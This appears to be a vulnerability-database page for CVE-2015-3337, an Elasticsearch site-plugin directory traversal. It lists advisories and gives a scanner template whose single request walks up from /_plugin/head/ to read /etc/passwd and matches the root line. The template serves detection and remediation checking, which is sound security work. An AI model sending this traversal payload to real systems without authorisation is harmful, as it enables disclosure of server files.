| Title | Published | Views | Family |
|---|---|---|---|
| ElasticSearch 1.4.5 / 1.5.2 - Path Transversal Vulnerability | 21 May 2015 00:00 | – | zdt |
| elasticsearch -- directory traversal attack with site plugins | 27 Apr 2015 00:00 | – | freebsd |
| CVE-2015-3337 | 6 Dec 2023 13:16 | – | circl |
| Elasticsearch Arbitrary File Disclosure Vulnerability | 30 Apr 2015 00:00 | – | cnvd |
| CVE-2015-3337 | 1 May 2015 15:00 | – | cve |
| CVE-2015-3337 | 1 May 2015 15:00 | – | cvelist |
| [SECURITY] [DSA 3241-1] elasticsearch security update | 29 Apr 2015 20:32 | – | debian |
| Debian DSA-3241-1 : elasticsearch - security update | 30 Apr 2015 00:00 | – | nessus |
| FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5) | 26 Jun 2015 00:00 | – | nessus |
| ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | 18 May 2015 00:00 | – | exploitdb |
```yaml
id: CVE-2015-3337

info:
  name: Elasticsearch - Local File Inclusion
  author: pdteam
  severity: medium
  description: |
    Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files
    via directory traversal in the path served for an installed site plugin (/_plugin/<name>/...).
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade to Elasticsearch 1.4.5 or 1.5.2 (or later). The issue is only reachable when a site plugin
    is installed, so removing site plugins is an interim mitigation until the upgrade.
  reference:
    - https://www.exploit-db.com/exploits/37054/
    - https://www.elastic.co/community/security
    - http://www.debian.org/security/2015/dsa-3241
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3337
    - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-3337
    cwe-id: CWE-22
    epss-score: 0.33129
    epss-percentile: 0.98148
    cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: elasticsearch
    product: elasticsearch
    fofa-query: index_not_found_exception
  tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin,vuln

http:
  - method: GET
    path:
      # Only the "head" site plugin is probed; a host with a different site plugin
      # installed would need that plugin's name in place of "head".
      - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"

    # Both matchers must hit: a 200 response whose body contains a passwd(5) line for uid 0.
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022031903cedaac4b2a9de92a60959a9214a3325ab9cebf25a4725a444ed694fb45d022100d9be7eab7719edf5ee111b45a1f77a9226fcb2a3775165fdf9e5161dc9fa961f:922c64590222798bb761d5b6d8e72950
```